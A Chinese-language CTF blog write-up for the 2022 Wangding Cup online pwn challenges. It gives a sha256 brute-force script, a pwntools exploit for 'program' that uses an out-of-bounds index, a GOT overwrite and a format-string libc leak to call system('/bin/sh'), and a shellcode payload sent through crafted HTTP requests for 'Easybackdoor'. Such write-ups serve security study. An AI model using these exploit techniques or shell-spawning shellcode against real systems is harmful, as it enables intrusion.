---
title: 2022 网鼎杯线上赛 pwn Writeup
date: 2022-08-24 6:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=43/
pin: false
published:
---

# 青龙组

## crypto091

```python
# _*_ coding:utf-8 _*_
from pwn import *
import sys
import struct
import hashlib
import os
from hashlib import sha256
# context.log_level = 'debug'

def dbg(con=''):
    gdb.attach(p,con)
    # pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
#-----------------------------------------------------------------------------------------

hs = 'c22a563acc2a587afbfaaaa6d67bc6e628872b00bd7e998873881f7c6fdc62fc'
for i in range(17090000000,17099999999):
	a = sha256('86'+str(i).encode()).hexdigest()
	if(a == hs):
		print(i)
		break

p.interactive()
```

## pwn239

非预期

![image-20220826195259755](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220826195259755.png)

# 白虎组

## program

![image-20220828203615901](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220828203615901.png)

got表可写，add函数记录size的数组下标为int类型，且num++是先完成所有赋值操作再自+1，导致可申请11个块内容，能覆盖到num这个下标变量。我们可以利用add功能在0x40a0这个数组上方等间隔地址写入内容，

执行show功能前会对num非0校验，show功能同样存在数组越界，利用这点可以实现在0x40a0这个数组上方等间隔地址泄露其内容，泄露长度在0x40a0这个数组最后几个位置取。

利用思路在0x40a0数组下标为-100时为printf_got+4的位置，-300时存在一个程序地址，泄露程序地址以获得基地址，再修改print_got+8(memset_got)为printf_plt，利用格式化字符串泄露libc地址(这里因为用stycpy写入内容，存在offbynull不能直接泄露got表)，泄露后用同样的方法改menset_got为system即可

![image-20220828203820184](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220828203820184.png)

![image-20220828204225818](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220828204225818.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
import sys
import struct
import hashlib
import os
from hashlib import sha256
# context.log_level = 'debug'

ip = ""
port = ""
# p = remote(ip,port)
p = process("./main")

elf = ELF("./main")
libc = elf.libc

def dbg(con=''):
    gdb.attach(p,con)
    # pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
#-----------------------------------------------------------------------------------------
def add(con,size):
	sl('1')
	p.sendlineafter("Please enter your data:",con)
	sla('Please enter the length of your data:',size)

def show(idx):
	sl("2")
	sla("Please enter the entry number of your data:",idx)

dest = 0x40A0

for i in range(10):
	add('\x00'*98,1)
	
# dbg('b *$rebase(0x13E5)\nc\n')
add('b'*8+p64(8),-2)
# dbg("dq $rebase(0x40a0) 200\n")

show(-3)
p.recvline()
base = u64(p.recv(6).ljust(8,'\x00'))-0x6b8
lg('base')

# dbg("dq $rebase(0x40a0) 200\n")
add('b'*4+p64(base+0x1070)[:-1],1)

for i in range(10):
	add('\x00'*98,1)
add('b'*8+p64(8),-1)# num=0
add('%33$p',1)

sl(2)
sl(1)

p.recvuntil("0x")
libc_base = int(p.recvuntil("Pl")[:-2],16)-0x24083
lg('libc_base')
bin_sh = libc_base+libc.search("/bin/sh").next()
system = libc_base + libc.sym['system']
one = libc_base +0xe3b01
lg('bin_sh')

for i in range(9):
	add('\x00'*98,1)
add('b'*8+p64(8),-2)
add('b'*4+p64(system),1)

add('/bin/sh',1)
sl(2)
p.interactive()
```

## Easybackdoor

逆向处理命令的函数fetch，获得输入命令的方式

输入后会判断输入是否可视化，同时判断相应字段执行功能

![image-20220827171338887](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220827171338887.png)

backdoor需要登录验证才能执行，会直接执行输入的shellcode，在执行前对寄存器进行了赋值，所以要先清空寄存器(汇编xor)，然后和shellcode拼接，用alpha3生成可视化shellcode

![image-20220827171531529](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220827171531529.png)

```python
from pwn import *
context.arch='amd64'
sc = '''
xor edi, edi
xor esi, esi
xor edx, edx
'''
scl = asm(sc)+asm(shellcraft.sh())
print scl
```



```python
# _*_ coding:utf-8 _*_
from pwn import *
p = process("./chall")
elf = ELF("./chall")
libc = elf.libc

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
#-----------------------------------------------------------------------------------------

pay = "POST /Login HTTP/1.0\r\n"
pay += "Content-Length:{}\n".format(len("root&R00T"))+'\n'
pay += "root&R00T"
ru("content> ")
p.send(pay)

sc = 'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M1L8N1M8N1O3s2G0P164I1P0Q2z1l0h7O1O0B0f1L3P3F080B08031K4p0X2t0i060N001N3V2t0Z0n0o14024v0e2n4y3N114P0Z130h7l040A04'
pay = "POST /B4ckd0or HTTP/1.0\r\n"
pay += "Content-Length:{}\n\n".format(len(sc))
pay += sc
ru("content> ")
p.send(pay)

p.interactive()
```

